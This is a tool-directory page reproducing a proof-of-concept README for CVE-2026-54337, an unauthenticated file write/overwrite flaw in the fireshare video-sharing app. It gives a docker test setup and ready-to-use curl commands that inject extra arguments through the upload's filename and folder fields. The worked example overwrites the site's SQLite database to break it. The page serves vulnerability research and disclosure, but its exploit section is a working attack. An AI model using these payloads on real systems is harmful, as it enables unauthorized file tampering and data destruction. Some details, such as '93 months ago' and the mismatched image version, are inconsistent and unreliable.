Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - Unauthenticated File Write/Overwrite PoC for fireshare <= 1.16.3 | Kitploit
Tools/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - Unauthenticated File Write/Overwrite PoC for fireshare <= 1.16.3

View Repository
93 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-54337 PoC

CVE-2026-54337 - Unauthenticated File Write/Overwrite in fireshare <= 1.16.3 PoC

For more information please refer to this Github advisory

Setup

  • Please use the following docker-compose.yml to test
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Exploit

  • Step 1: Create any file as long as you named it with .mp4 extension, for example
$ echo 123 > test.mp4
  • Step 2: Run the following curl command (make sure to change the placeholder
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

For example, to overwrite /data/db.sqlite you will change the command to as following

$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Note

  • Since by default, the service is run under nginx user, which only has access to /data, /processed, /images and /videos, therefore you can only write/overwrite there
  • Because of that in my opinion, overwriting /data/db.sqlite has the highest impact as it will render the website unusable

Disclaimer

  • This proof-of-concept (PoC) is provided for educational, research, and defensive security purposes only.
  • The author is not responsible for any misuse, damage, unauthorized access, service disruption, data loss, or legal consequences resulting from the use of this code. Users are solely responsible for ensuring that they comply with all applicable laws, regulations, and authorization requirements before using this PoC.
  • This PoC should only be executed against systems for which you have explicit permission to test. Unauthorized testing of systems may be illegal and unethical.
  • By using this software, you acknowledge that you do so at your own risk.
Download Tool